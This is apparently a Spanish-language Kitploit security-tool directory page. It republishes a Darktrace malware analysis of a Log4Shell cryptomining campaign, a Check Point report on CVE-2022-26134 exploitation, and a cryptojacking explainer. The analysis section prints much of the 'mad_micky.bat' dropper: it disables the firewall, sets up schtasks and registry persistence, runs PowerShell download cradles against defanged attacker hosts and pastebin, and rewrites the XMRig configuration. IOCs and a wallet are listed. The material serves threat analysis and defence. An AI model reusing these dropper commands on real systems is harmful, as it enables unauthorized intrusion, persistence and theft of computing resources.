Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Log4j-Vulnerability — La vulnerabilidad CVE-2021-44228 permite la ejecución remota de código sin autenticación en varias versiones de Apache Log4j2 (Log4Shell). Los atacantes pueden explotar servidores vulnerables conectándose a través de cualquier protocolo, como HTTPS, y enviando una cadena especialmente diseñada. | Kitploit
Herramientas/GitHubGitHub/demining/log4j-vulnerability
Gestión de Indicadores de Compromiso (IOC)Análisis de VulnerabilidadesExplotaciónAnálisis de MalwareInteligencia de AmenazasAprendizaje y Educación
GitHubdemining/log4j-vulnerability

Log4j-Vulnerability

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

La vulnerabilidad CVE-2021-44228 permite la ejecución remota de código sin autenticación en varias versiones de Apache Log4j2 (Log4Shell). Los atacantes pueden explotar servidores vulnerables conectándose a través de cualquier protocolo, como HTTPS, y enviando una cadena especialmente diseñada.

Sitio web
62hace 3 añosAún no revisado
Compartir

Vulnerabilidad Log4j



Exploit en el código de minería de criptomonedas que utilizó una peligrosa vulnerabilidad Log4j
  • Tutorial: https://youtu.be/PNDBjoT83zA
  • Tutorial: https://cryptodeeptech.ru/log4j-vulnerability


Antecedentes de Log4j

El equipo de seguridad de Alibaba Cloud reveló públicamente una vulnerabilidad crítica (CVE-2021-44228) que permite la ejecución remota de código sin autenticación contra múltiples versiones de Apache Log4j2 (Log4Shell). Los servidores vulnerables pueden ser explotados por atacantes que se conectan a través de cualquier protocolo, como HTTPS, y envían una cadena especialmente diseñada.

Campaña de criptominería Log4j

Darktrace detectó criptominería en múltiples implementaciones de clientes como resultado de la explotación de esta vulnerabilidad de Log4j. En cada uno de estos incidentes, la explotación se produjo a través de conexiones SSL salientes que parecían ser solicitudes de scripts de PowerShell codificados en base64 para evadir las defensas perimetrales y descargar archivos de script por lotes (.bat), así como múltiples ejecutables que instalan malware de criptominería. La actividad presentaba indicadores de campaña más amplios, incluidas IPs hardcodeadas comunes, archivos ejecutables y scripts.

El ciclo de ataque comienza con lo que parece ser un escaneo oportunista de dispositivos conectados a Internet en busca de servidores VMWare Horizons vulnerables al exploit Log4j. Una vez que se encuentra un servidor vulnerable, el atacante realiza conexiones HTTP y SSL hacia la víctima. Tras una explotación exitosa, el servidor realiza una devolución de llamada (callback) en el puerto 1389, recuperando un script llamado mad_micky.bat. Esto logra lo siguiente:

  • Desactiva el firewall de Windows estableciendo todos los perfiles en state=off
    ‘netsh advfirewall set allprofiles state off’
  • Busca procesos existentes que indiquen otras instalaciones de mineros usando ‘netstat -ano | findstr TCP’ para identificar cualquier proceso que opere en los puertos :3333, :4444, :5555, :7777, :9000 y detener los procesos en ejecución
  • Se inicia un nuevo webclient para descargar silenciosamente wxm.exe
  • Se utilizan tareas programadas para crear persistencia. El comando ‘schtasks /create /F /sc minute /mo 1 /tn –‘ programa una tarea y suprime advertencias; la tarea debe programarse dentro de un minuto después del comando y se le asigna el nombre ‘BrowserUpdate’, apuntando al dominio malicioso ‘b.oracleservice[.]top’ y a IPs hardcodeadas: 198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080
  • Se agregan claves de registro en RunOnce para persistencia: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d

En al menos dos casos, el script mad_micky.bat se recuperó en una conexión HTTP que tenía el user agent Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS). Esta fue la primera y única vez que se vio este user agent en estas redes. Parece que este user agent es utilizado legítimamente por algunos dispositivos ASUS con instalaciones de fábrica recientes; sin embargo, al ser un user agent nuevo visto solo durante esta actividad, resulta sospechoso.

Tras una explotación exitosa, el servidor realiza una devolución de llamada en el puerto 1389 para recuperar archivos de script. En este ejemplo, /xms.ps1, un script de PowerShell codificado en base64 que evade la política de ejecución en el host para invocar ‘mad_micky.bat’:

Exploit en el código de minería de criptomonedas que utilizó una peligrosa vulnerabilidad Log4j

Figura 1: Información adicional sobre el script de PowerShell xms.ps1

La captura detalla el registro de eventos de un servidor afectado e indica una RCE de Log4j exitosa que resultó en la descarga del archivo mad_micky.bat:

Exploit en el código de minería de criptomonedas que utilizó una peligrosa vulnerabilidad Log4j

Figura 2: Datos de registro que resaltan el archivo mad_micky.bat

Se iniciaron conexiones adicionales para recuperar archivos ejecutables y scripts. Los scripts contenían dos direcciones IP ubicadas en Corea y Ucrania. Se realizó una conexión a la IP ucraniana para descargar el archivo ejecutable xm.exe, que activa el minero. El minero, XMRig Miner (en este caso), es una herramienta de minería de código abierto y multiplataforma disponible para descargar desde múltiples ubicaciones públicas. La siguiente descarga de ejecutable observada fue ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4).

Exploit en el código de minería de criptomonedas que utilizó una peligrosa vulnerabilidad Log4j

Figura 3: Información adicional sobre el ejecutable XMRig

La conexión a la IP coreana implicó una solicitud de otro script (/2.ps1), así como de un archivo ejecutable (LogBack.exe). Este script elimina tareas en ejecución asociadas con el registro, incluidos el filtro de registro de eventos de SCM o el consumidor de registro de eventos de PowerShell. El script también solicita un archivo de Pastebin, que posiblemente sea un archivo de configuración de beacon de Cobalt Strike. Las eliminaciones de registros se realizaron a través de tareas programadas y WMI e incluyeron: Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer.

  • Archivo de configuración (ya no alojado): IEX (New-Object System.Net.Webclient) DownloadString(‘hxxps://pastebin.com/raw/g93wWHkR’)

El segundo archivo solicitado de Pastebin, aunque ya no está alojado por Pastebin, es parte de un comando schtasks y, por lo tanto, probablemente se usa para establecer persistencia:

  • schtasks /create /sc MINUTE /mo 5 /tn  “\Microsoft\windows\.NET Framework\.NET Framework NGEN v4.0.30319 32” /tr “c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c ‘IEX ((new-object net.webclient).downloadstring(”hxxps://pastebin.com/raw/bcFqDdXx”’))'”  /F /ru System

El archivo ejecutable Logback.exe es otra herramienta de minería XMRig. También se descargó un archivo config.json desde la misma IP coreana. Después de esto, se utilizaron comandos cmd.exe y wmic para configurar el minero.

Estas descargas de archivos y la configuración del minero fueron seguidas por conexiones adicionales a Pastebin.

Exploit en el código de minería de criptomonedas que utilizó una peligrosa vulnerabilidad Log4j

Figura 4: Correlación OSINT del archivo mad_micky.bat


Detalles del proceso — archivo mad_micky.bat

Instalación

root@kitploit:~
set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup”

looking for the following utilities: powershell, find, findstr, tasklist, sc
set “LOGFILE=%USERPROFILE%\mimu6\xmrig.log”
if %EXP_MONER_HASHRATE% gtr 8192 ( set PORT=18192 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 4096 ( set PORT=14906 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 2048 ( set PORT=12048 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 1024 ( set PORT=11024 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 512 ( set PORT=10512 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 256 ( set PORT=10256 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 128 ( set PORT=10128 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 64 ( set PORT=10064 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 32 ( set PORT=10032 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 16 ( set PORT=10016 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 8 ( set PORT=10008 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 4 ( set PORT=10004 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 2 ( set PORT=10002 & goto PORT_OK)
set port=10001

Preparación del minero

root@kitploit:~
echo [*] Removing previous mimu miner (if any)
sc stop gado_miner
sc delete gado_miner
taskkill /f /t /im xmrig.exe
taskkill /f /t/im logback.exe
taskkill /f /t /im network02.exe
:REMOVE_DIR0
echo [*] Removing “%USERPROFILE%\mimu6” directory
timeout 5
rmdir /q /s “USERPROFILE%\mimu6” >NUL 2>NUL
IF EXIST “%USERPROFILE%\mimu6” GOTO REMOVE_DIR0

Descarga de XMRIG

root@kitploit:~
echo [*] Downloading MoneroOcean advanced version of XMRig to “%USERPROFILE%\xmrig.zip”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘http://141.85.161[.]18/xmrig.zip’, ;%USERPROFILE%\xmrig.zip’)”
echo copying to mimu directory
if errorlevel 1 (
echo ERROR: Can’t download MoneroOcean advanced version of xmrig
goto MINER_BAD)

Desempaquetar e instalar

root@kitploit:~
echo [*] Unpacking “%USERPROFILE%\xmrig.zip” to “%USERPROFILE%\mimu6”
powershell -Command “Add-type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(‘%USERPROFILE%\xmrig.zip’, ‘%USERPROFILE%\mimu6’)”
if errorlevel 1 (
echo [*] Downloading 7za.exe to “%USERPROFILE%za.exe”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.Downloadfile(‘http://141.85.161[.]18/7za.txt’, ‘%USERPROFILE%za.exe’”

powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”url\”: *\”.*\”,’, ‘\”url\”: \”207.38.87[.]6:3333\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”user\”: *\”.*\”,’, ‘\”user\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”pass\”: *\”.*\”,’, ‘\”pass\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”max-cpu-usage\”: *\d*,’, ‘\”max-cpu-usage\”: 100,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
set LOGFILE2=%LOGFILE:\=\\%
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”log-file\”: *null,’, ‘\”log-file\”: \”%LOGFILE2%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
if %ADMIN% == 1 goto ADMIN_MINER_SETUP

if exist “%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” (
set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
goto STARTUP_DIR_OK
)
if exist “%USERPROFILE%\Start Menu\Programs\Startup” (
set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup”
goto STARTUP_DIR_OK
)
echo [*] Downloading tools to make gado_miner service to “%USERPROFILE%\nssm.zip”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘[http://141.85.161[.]18/nssm.zip’, ‘%USERPROFILE%\nssm.zip’)”
if errorlevel 1 (
echo ERROR: Can’t download tools to make gado_miner service
exit /b 1

Detección de la campaña con Darktrace

Las alertas de modelos clave que Darktrace utilizó para identificar esta campaña incluyen modelos centrados en compromisos para Application Protocol on Uncommon Port, Outgoing Connection to Rare From Server y Beaconing to Rare Destination. Modelos centrados en archivos para Masqueraded File Transfer, Multiple Executable Files and Scripts from Rare Locations y Compressed Content from Rare External Location. La minería de criptomonedas se detecta bajo los modelos Cryptocurrency Mining Activity.

Los modelos asociados con Unusual PowerShell to Rare and New User Agent resaltan las conexiones anómalas en los dispositivos infectados después de las devoluciones de llamada de Log4j.

Los clientes con la tecnología Autonomous Response de Darktrace, Antigena, también contaron con acciones para bloquear los archivos y scripts entrantes descargados y restringir los dispositivos infectados a su patrón normal de vida, con el fin de prevenir tanto las descargas iniciales de archivos maliciosos como la actividad continua de criptominería.

Apéndice

Detecciones de modelos de Darktrace

  • Anomalous Connection / Application Protocol on Uncommon Port
  • Anomalous Connection / New User Agent to IP Without Hostname
  • Anomalous Connection / PowerShell to Rare External
  • Anomalous File / EXE from Rare External location
  • Anomalous File / Masqueraded File Transfer
  • Anomalous File / Multiple EXE from Rare External Locations
  • Anomalous File / Script from Rare External Location
  • Anomalous File / Zip or Gzip from Rare External Location
  • Anomalous Server Activity / Outgoing from Server
  • Compliance / Crypto Currency Mining Activity
  • Compromise / Agent Beacon (Long Period)
  • Compromise / Agent Beacon (Medium Period)
  • Compromise / Agent Beacon (Short Period)
  • Compromise / Beacon to Young Endpoint
  • Compromise / Beaconing Activity To External Rare
  • Compromise / Crypto Currency Mining Activity
  • Compromise / Sustained TCP Beaconing Activity To Rare Endpoint
  • Device / New PowerShell User Agent
  • Device / Suspicious Domain

Técnicas MITRE ATT&CK observadas

Exploit en el código de minería de criptomonedas que utilizó una peligrosa vulnerabilidad Log4j

IoCs

Exploit en el código de minería de criptomonedas que utilizó una peligrosa vulnerabilidad Log4j Exploit en el código de minería de criptomonedas que utilizó una peligrosa vulnerabilidad Log4j Exploit en el código de minería de criptomonedas que utilizó una peligrosa vulnerabilidad Log4j

El 31 de mayo, Volexity, una empresa de seguridad, reportó a Atlassian una vulnerabilidad crítica sin parchear que afecta a todas las versiones compatibles de Confluence Server y Data Center.

Atlassian advirtió a sus clientes sobre la vulnerabilidad crítica el 2 de junio y publicó un parche un día después. CISA agregó esta vulnerabilidad a su lista de Known Exploited Vulnerabilities el 3 de junio.

Check Point lanzó una protección dedicada para prevenir un ataque que explote esta vulnerabilidad y recomienda a los clientes parchear los sistemas afectados.

La vulnerabilidad

La vulnerabilidad en Atlassian Confluence y Data Center, designada como CVE-2022-26134, puede provocar un ataque de inyección de expresiones Object-Graph Navigation Language (OGNL) sin autenticación.

Un atacante remoto no autenticado puede utilizar esta vulnerabilidad para ejecutar código arbitrario en el servidor objetivo colocando una carga maliciosa en la URI.

Exploit en el código de minería de criptomonedas que utilizó una peligrosa vulnerabilidad Log4j

Figura 1: Carga maliciosa que explota CVE-2022-26134.

Explotación en el mundo real

Los investigadores de Check Point Research (CPR) notaron una gran cantidad de intentos de explotación desde que se publicó la vulnerabilidad. Al principio, muchos de los posibles atacantes utilizaron métodos de escaneo para identificar objetivos vulnerables. Después de unos días, los atacantes comenzaron a utilizar la vulnerabilidad para descargar malware en los sistemas afectados.

Entre los registros de explotación, los investigadores notaron algunas cargas maliciosas relacionadas con la misma campaña y originadas desde la misma fuente, pero dirigidas a diferentes plataformas: Linux y Windows.

La cadena de infección depende del sistema operativo de la víctima.

Ataque dirigido al sistema operativo Linux

El atacante utilizó la vulnerabilidad de día cero de Atlassian enviando una solicitud HTTP manipulada a la víctima.

Exploit en el código de minería de criptomonedas que utilizó una peligrosa vulnerabilidad Log4j

Figura 2: Una solicitud HTTP manipulada que explota CVE-2022-26134 con una carga codificada en base64.

La cadena base64 se decodifica en otra cadena codificada en base64. En general, los investigadores tuvieron que decodificar la cadena varias veces para obtener la carga real.

Exploit en el código de minería de criptomonedas que utilizó una peligrosa vulnerabilidad Log4j

Figura 3: La cadena base64 decodificada.

Este script descarga un archivo de script bash llamado xms desde el servidor C&C remoto a la carpeta tmp de la víctima, lo ejecuta y lo elimina después.

Exploit en el código de minería de criptomonedas que usó una peligrosa vulnerabilidad Log4j

Figura 4: Parte del script malicioso xms.

El xms es un script dropper. Desinstala los agentes en ejecución de la máquina de la víctima y se añade a los trabajos cron para mantener la persistencia tras el reinicio.

Además, se realiza constantemente una prueba de conectividad de red a a[.]oracleservice.top.

En un intento de propagarse a otras máquinas, el script busca claves ssh e intenta conectarse. Luego descarga el archivo xms desde el servidor C&C y lo ejecuta.

El script descarga un archivo ejecutable elf llamado dbused a la carpeta tmp en varias IPs remotas.

El archivo dbused está empaquetado con upx para evitar la detección estática.

El archivo elf es un minero de criptomonedas que agota los recursos de la máquina de la víctima:

Exploit en el código de minería de criptomonedas que usó una peligrosa vulnerabilidad Log4j

Figura 5: El proceso dbused agota los recursos del sistema.

Ataque dirigido al sistema operativo Windows

El atacante utilizó la vulnerabilidad de Atlassian para ejecutar un cradle de descarga de PowerShell e iniciar un ataque sin archivos desde un servidor C&C remoto.

Exploit en el código de minería de criptomonedas que usó una peligrosa vulnerabilidad Log4j

Figura 6: Una solicitud HTTP manipulada que explota CVE-2022-26134 mediante comandos de PowerShell.

El script lol.ps1 se inyecta en un proceso de memoria de PowerShell.

El script verifica la arquitectura del procesador, usando wmi para comprobar si coincide con sus requisitos.
Luego descarga un archivo ejecutable llamado checkit2 a la carpeta tmp y lo ejecuta en modo oculto.

Exploit en el código de minería de criptomonedas que usó una peligrosa vulnerabilidad Log4j

Figura 7: El script lol.ps1.

El proceso checkit2.exe genera un proceso hijo, llamado InstallUtil.exe, que se conecta al servidor C&C. A su vez, InstallUtil.exe genera otro proceso hijo, AddInProcess.exe, que es el minero de criptomonedas. Después de unos momentos de ejecución en la máquina de la víctima, el proceso checkit2 se termina a sí mismo.

Exploit en el código de minería de criptomonedas que usó una peligrosa vulnerabilidad Log4j

Figura 8: El proceso checkit2.exe ejecutándose en el sistema.

Exploit en el código de minería de criptomonedas que usó una peligrosa vulnerabilidad Log4j

Figura 9: El proceso InstallUtil.exe ejecutándose en el sistema.

El malware descarga una nueva copia de sí mismo, con un nuevo nombre, en la carpeta del Menú Inicio.

Exploit en el código de minería de criptomonedas que usó una peligrosa vulnerabilidad Log4j

Figura 10: El archivo cloud.exe descargado en la carpeta de Inicio.

El minero de criptomonedas ahora se ejecuta en la máquina y agota todos los recursos del sistema:

Exploit en el código de minería de criptomonedas que usó una peligrosa vulnerabilidad Log4j

Figura 11: Información del monedero de criptomonedas.

Cadena de ataque

Exploit en el código de minería de criptomonedas que usó una peligrosa vulnerabilidad Log4j

Ambos escenarios de ataque comienzan con una solicitud HTTP manipulada inicial que explota la vulnerabilidad CVE-2022-26134. El atacante ejecuta comandos utilizando la función de ejecución de Java para descargar un payload malicioso a la máquina de la víctima.

El payload malicioso descarga entonces un archivo ejecutable según el sistema operativo afectado. Ambos ejecutables ejecutan un minero de criptomonedas para aprovechar los recursos de la víctima en su propio beneficio.

Actores de amenazas

El dominio a[.]oracleservice.top y el monedero de criptomonedas que extrajimos del sistema están relacionados con un grupo cibercriminal llamado la “pandilla 8220”.

Protecciones de Check Point:

IPS:
Ejecución remota de código en Atlassian Confluence (CVE-2022-26134)

Anti-Bot:
Trojan.WIN32.XMRig

IOCs:

198.251.86[.]46

51.79.175[.]139

167.114.114[.]169

146.59.198[.]38

51.255.171[.]23

a.oracleservice[.]top

d2bae17920768883ff8ac9a8516f9708967f6c6afe2aa6da0241abf8da32456e

2622f6651e6eb01fc282565ccbd72caba9844d941b9d1c6e6046f68fc873d5e0

4e48080f37debd76af54a3231ecaf3aa254a008fae1253cdccfcc36640f955d9

4b8be1d23644f8cd5ea22fa4f70ee7213d56e3d73cbe1d0cc3c8e5dfafe753e0

Monedero Monero:
46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ


Cryptojacking explicado: Cómo prevenirlo, detectarlo y recuperarse de él

Los ciberdelincuentes están utilizando tácticas similares al ransomware y sitios web envenenados para que los ordenadores de tus empleados minen criptomonedas. Esto es lo que puedes hacer para detenerlo.

Definición de criptojacking

El criptojacking es el uso no autorizado de los recursos informáticos de otra persona para minar criptomonedas. Los hackers buscan secuestrar cualquier tipo de sistema que puedan tomar—escritorios, servidores, infraestructura en la nube y más—para minar criptomonedas de forma ilícita.

Independientemente del mecanismo de entrega, el código de criptojacking suele funcionar silenciosamente en segundo plano mientras las víctimas desprevenidas usan sus sistemas con normalidad. Las únicas señales que podrían notar son un rendimiento más lento, retrasos en la ejecución, sobrecalentamiento, consumo excesivo de energía o facturas de computación en la nube anormalmente altas.

Cómo funciona el criptojacking

La minería de monedas es un proceso legítimo en el mundo de las criptomonedas que libera nueva criptomoneda en circulación. El proceso funciona recompensando con moneda al primer minero que resuelve un problema computacional complejo. Ese problema completa bloques de transacciones verificadas que se añaden a la cadena de bloques de la criptomoneda.

“Los mineros esencialmente cobran por su trabajo como auditores. Hacen el trabajo de verificar la legitimidad de las transacciones de Bitcoin”, detalló un explicador reciente de Investopedia sobre cómo funciona la minería de Bitcoin. “Además de llenar los bolsillos de los mineros y respaldar el ecosistema de Bitcoin, la minería cumple otro propósito vital: es la única forma de liberar nueva criptomoneda en circulación”.

Ganar criptomonedas mediante la minería de monedas normalmente requiere una enorme cantidad de potencia de procesamiento y energía. Además, el ecosistema de las criptomonedas está diseñado de manera que hace la minería más difícil y reduce las recompensas con el tiempo y con más competencia minera. Esto convierte la minería legítima de criptomonedas en un asunto extremadamente costoso, con gastos que aumentan constantemente.

Los ciberdelincuentes reducen los costes de la minería simplemente robando recursos informáticos y energéticos. Utilizan una serie de técnicas de hacking para obtener acceso a sistemas que realizarán el trabajo computacional de forma ilícita y luego hacen que estos sistemas secuestrados envíen los resultados a un servidor controlado por el hacker.

Métodos de ataque de criptojacking

Los métodos de ataque están limitados únicamente por la creatividad de los criptojackers, pero los siguientes son algunos de los más comunes que se utilizan hoy en día.

Ataques a endpoints

En el pasado, el criptojacking era principalmente una estrategia de malware de endpoints, que existía como un objetivo más de lucro para colocar malware en ordenadores de escritorio y portátiles. El malware tradicional de criptojacking se entrega a través de vías típicas como malware sin archivos, esquemas de phishing y scripts maliciosos incrustados en sitios web y aplicaciones web.

La forma más básica en que los atacantes de criptojacking pueden robar recursos es enviando a los usuarios finales un correo electrónico de apariencia legítima que los anima a hacer clic en un enlace que ejecuta código para colocar un script de criptominería en su ordenador. Este se ejecuta en segundo plano y envía los resultados a través de una infraestructura de comando y control (C2).

Otro método es inyectar un script en un sitio web o en un anuncio que se entrega a múltiples sitios web. Una vez que las víctimas visitan el sitio web o el anuncio infectado aparece en sus navegadores, el script se ejecuta automáticamente. No se almacena ningún código en los ordenadores de las víctimas.

Estas vías siguen siendo una preocupación legítima, aunque los delincuentes han añadido técnicas significativamente más sofisticadas a sus manuales de criptojacking mientras buscan aumentar sus beneficios; algunos de estos métodos en evolución se describen a continuación.

Escaneo de servidores y dispositivos de red vulnerables

Los atacantes buscan aumentar la rentabilidad del criptojacking expandiendo sus horizontes hacia servidores, dispositivos de red e incluso dispositivos IoT. Los servidores, por ejemplo, son un objetivo especialmente jugoso ya que normalmente tienen más potencia que un ordenador de escritorio corriente. También son un campo de caza privilegiado en 2022, ya que los delincuentes escanean servidores expuestos a internet público que contienen vulnerabilidades como Log4J, explotando la falla y cargando silenciosamente software de criptominería en el sistema conectado a los servidores del hacker. A menudo, los atacantes utilizan el sistema inicialmente comprometido para mover su criptojacking lateralmente hacia otros dispositivos de red.

“Estamos viendo un aumento en la criptominería derivada de la vulnerabilidad Log4J”, dice Sally Vincent, ingeniera sénior de investigación de amenazas de LogRhythm. “Los hackers están irrumpiendo en las redes e instalando malware que utiliza almacenamiento para minar criptomonedas”.

Ataques a la cadena de suministro de software

Los ciberdelincuentes están atacando la cadena de suministro de software sembrando repositorios de código abierto con paquetes y bibliotecas maliciosos que contienen scripts de criptojacking incrustados en su código. Con desarrolladores descargando estos paquetes por millones en todo el mundo, estos ataques pueden escalar rápidamente la infraestructura de criptojacking para los delincuentes de dos maneras. Los paquetes maliciosos pueden usarse para atacar los sistemas de los desarrolladores—y las redes y recursos en la nube a los que se conectan—para utilizarlos directamente como recursos ilícitos de criptominería. O pueden aprovechar estos ataques para envenenar el software que estos desarrolladores están construyendo con componentes que ejecutan scripts de criptominería en las máquinas del usuario final de una aplicación.

Aprovechamiento de la infraestructura en la nube

Muchas empresas de criptojacking están aprovechando la escalabilidad de los recursos en la nube irrumpiendo en la infraestructura en la nube y accediendo a una colección aún más amplia de grupos de cómputo para alimentar su actividad minera. Un estudio del otoño pasado del Equipo de Acción de Ciberseguridad de Google informó que el 86% de las instancias en la nube comprometidas se utilizan para criptominería.

“Hoy en día, los atacantes están apuntando a los servicios en la nube por cualquier medio para minar cada vez más criptomonedas, ya que los servicios en la nube pueden permitirles ejecutar sus cálculos a mayor escala que una sola máquina local, ya sea apoderándose del entorno en la nube administrado de un usuario o incluso abusando de aplicaciones SaaS para ejecutar sus cálculos”, escribió Guy Arazi, investigador sénior de seguridad de Palo Alto Networks, en una publicación de blog.

Uno de los métodos comunes para hacerlo es escanear en busca de API de contenedores expuestas o buckets de almacenamiento en la nube no seguros y usar ese acceso para comenzar a cargar software de minería de monedas en instancias de contenedores afectadas o servidores en la nube. El ataque suele automatizarse con software de escaneo que busca servidores accesibles desde internet público con API expuestas o posible acceso no autenticado. Los atacantes generalmente usan scripts para colocar los payloads mineros en el sistema inicial y buscar formas de propagarse a través de los sistemas en la nube conectados.

“La rentabilidad y la facilidad de llevar a cabo criptojacking a escala hacen que este tipo de ataque sea un objetivo fácil”, dijo Matt Muir, investigador de seguridad de Cado Security, en una publicación de blog en la que explica que los ataques basados en la nube son particularmente lucrativos. “Esto probablemente continuará mientras los usuarios sigan exponiendo servicios como Docker y Redis a redes no confiables”.

Por qué el criptojacking es popular

Según un informe de ReasonLabs, en el último año el 58,4% de todos los troyanos detectados eran mineros de monedas de criptojacking. Mientras tanto, otro estudio de SonicWall encontró que 2021 fue el peor año hasta la fecha para los ataques de criptojacking, con la categoría registrando 97,1 millones de ataques durante el año. Estas cifras son tan contundentes porque el criptojacking es prácticamente una fábrica de dinero para los ciberdelincuentes.

Cuando un delincuente puede minar criptomonedas en un grupo aparentemente ilimitado de recursos informáticos gratuitos de las máquinas de las víctimas, el beneficio para ellos es enorme. Incluso con la caída precipitada de la valoración de Bitcoin esta primavera que la llevó por debajo del nivel de los 30.000 dólares, los márgenes ilegales de los criptojackers siguen teniendo sentido comercial, ya que el valor de lo que minan supera con creces los costes de su infraestructura criminal.

Ejemplos reales de criptojacking

WatchDog ataca endpoints de la API de Docker Engine y servidores Redis

Un honeypot del equipo de investigación de seguridad de Cado Labs descubrió un ataque de criptojacking de múltiples etapas que ataca endpoints expuestos de la API de Docker Engine y servidores Redis, y puede propagarse de manera similar a un gusano. El ataque es perpetrado por el grupo de ataque WatchDog, que ha estado particularmente activo a finales de 2021 y 2022 con numerosas campañas de criptojacking.

Instancias de Alibaba ECS en el punto de mira de la criptominería

TeamTNT fue uno de los primeros grupos de hacking en desplazar el enfoque del criptojacking hacia los servicios orientados a la nube. Investigadores de TrendMicro a finales de 2021 informaron que este grupo, junto con rivales como la banda Kinsig, estaban llevando a cabo campañas de criptojacking que instalaban mineros en instancias de Alibaba Elastic Computing Service (ECS) y deshabilitaban funciones de seguridad para evadir la detección. 

Bots mineros y backdoors usan Log4J para atacar servidores VMware Horizon

La vulnerabilidad Log4Shell ha sido una bendición para los atacantes de criptojacking en 2022. En un ejemplo notable, investigadores de Sophos descubrieron a principios de este año que una ‘horda’ de atacantes estaba apuntando a servidores VMware Horizon para entregar una variedad de payloads de criptojacking que incluían z0Miner, el minero JavaX y al menos dos variantes de XMRig, los bots mineros de criptomonedas Jin y Mimu.

Ataques a la cadena de suministro mediante bibliotecas npm

Los expertos en seguridad de la cadena de suministro de software de Sonatype en el otoño de 2021 dieron la alarma sobre paquetes maliciosos de criptominería ocultos en npm, el repositorio de paquetes de JavaScript utilizado por desarrolladores de todo el mundo. En ese momento encontró un trío de paquetes, al menos uno de los cuales se hacía pasar por una biblioteca legítima y popular utilizada por desarrolladores llamada “ua-parser-js”, que recibe más de 7 millones de descargas semanales y sería una forma ideal de atraer a los desarrolladores para que descargaran accidentalmente un código malicioso y lo instalaran en su software.

Unos meses después de ese informe, los investigadores de WhiteSource (ahora Mend) publicaron un informe adicional que mostró que npm está repleto de código malicioso—hasta 1.300 paquetes maliciosos que incluyen criptojacking y otros comportamientos nefarios.

Atacantes rumanos apuntan a máquinas Linux con malware de criptominería

El verano pasado, Bitdefender descubrió un grupo de amenazas rumano que atacaba máquinas basadas en Linux con credenciales SSH para desplegar malware de minería de Monero. Las herramientas que utilizaban se distribuían bajo un modelo «as-a-service». Este ejemplo estaba en la punta de lanza de lo que parece ser una tendencia creciente de ataques de criptominería en sistemas Linux. Un informe de VMware publicado a principios de este año detallaba un creciente enfoque en los entornos multinube basados en Linux, en particular mediante el uso del software de minería XMRig.

«Muchas de las muestras de criptominería de sistemas basados en Linux tienen alguna relación con la aplicación XMRig», explicaba el informe, que mostró que el 89 % de los ataques de criptominería utilizaban bibliotecas relacionadas con XMRig. «Por lo tanto, cuando se identifican bibliotecas y módulos específicos de XMRig en binarios de Linux, es probable que sea evidencia de un posible comportamiento de criptominería.

CoinStomp emplea tácticas de evasión sofisticadas

